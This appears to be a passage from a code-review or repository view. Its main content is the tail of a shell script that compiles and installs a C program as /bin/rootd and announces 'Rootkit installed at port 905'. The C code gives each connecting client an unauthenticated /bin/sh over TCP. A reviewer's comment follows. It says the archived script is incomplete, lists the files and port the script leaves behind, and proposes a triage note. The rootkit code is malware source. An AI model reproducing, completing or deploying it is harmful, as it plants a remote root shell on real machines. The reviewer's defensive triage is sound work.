clipid=getpid();
serpid=fork();
if (serpid > 0)
waitpid(0, &stat, 0);
dup2(sockcli, 1);
execl("/bin/sh","sh",(char *)0); }
close(sockcli); }
void die(char *error) {
fprintf(stderr, "%s\n", error);
exit(1); }
EOF
gcc -o /bin/rootd /tmp/rootd.c
rm -f /tmp/rootd.c
rootd $port $max
echo "Rootkit installed at port 905"
exit 0
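Review bot: As archived this file is not a working script, and a comment should say so. The `EOF` line near the end has no matching here-document opener, so the shell reads the `#include` lines as comments, the C text is never written to `/tmp/rootd.c`, and `$port` and `$max` are never assigned. For triage the strings are what matter: `/bin/rootd`, `/tmp/rootd.c`, and a listener on TCP port 905 (`port=905`) whose accepted socket is duplicated onto descriptor 1 before `execl("/bin/sh", ...)`, with no authentication step visible in the code. I would add after the header: `# NOTE(analysis): incomplete sample; artefacts are /bin/rootd, /tmp/rootd.c and a TCP/905 listener`.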
Binary file not shown.
Binary file not shown.
Binary file not shown.